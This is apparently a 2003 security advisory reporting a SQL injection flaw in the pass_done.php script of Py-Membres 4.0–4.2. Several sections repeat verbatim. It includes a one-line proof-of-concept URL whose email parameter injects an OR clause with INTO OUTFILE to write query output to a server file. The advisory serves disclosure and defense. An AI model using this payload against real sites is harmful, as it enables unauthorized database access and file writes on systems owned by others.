Py-Membres Pass_done.PHP Remote SQL Injection Vulnerability
BID:8500
Info
Py-Membres Pass_done.PHP Remote SQL Injection Vulnerability
| Bugtraq ID: | 8500 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Aug 26 2003 12:00AM |
| Updated: | Aug 26 2003 12:00AM |
| Credit: | The disclosure of this issue has been credited to Frog Man <[email protected]>. |
| Vulnerable: |
Py-Membres Py-Membres 4.2 Py-Membres Py-Membres 4.1 Py-Membres Py-Membres 4.0 |
| Not Vulnerable: | |
Discussion
Py-Membres Pass_done.PHP Remote SQL Injection Vulnerability
A vulnerability has been reported for Py-Membres that allows remote attackers to modify the logic of SQL queries.
It has been reported that an input validation error exists in the pass_done.php file included with Py-Membres. Because of this, a remote attacker may launch SQL injection attacks through the software.
A vulnerability has been reported for Py-Membres that allows remote attackers to modify the logic of SQL queries.
It has been reported that an input validation error exists in the pass_done.php file included with Py-Membres. Because of this, a remote attacker may launch SQL injection attacks through the software.
Exploit / POC
Py-Membres Pass_done.PHP Remote SQL Injection Vulnerability
The following proof of concept was provided:
http://www.example.com/pass_done.php?Submit=1&email='%20OR%203%20IN%20(1,2,3)%20INTO%20OUTFILE%20'/complete/path/file.txt
The following proof of concept was provided:
http://www.example.com/pass_done.php?Submit=1&email='%20OR%203%20IN%20(1,2,3)%20INTO%20OUTFILE%20'/complete/path/file.txt
Solution / Fix
Py-Membres Pass_done.PHP Remote SQL Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.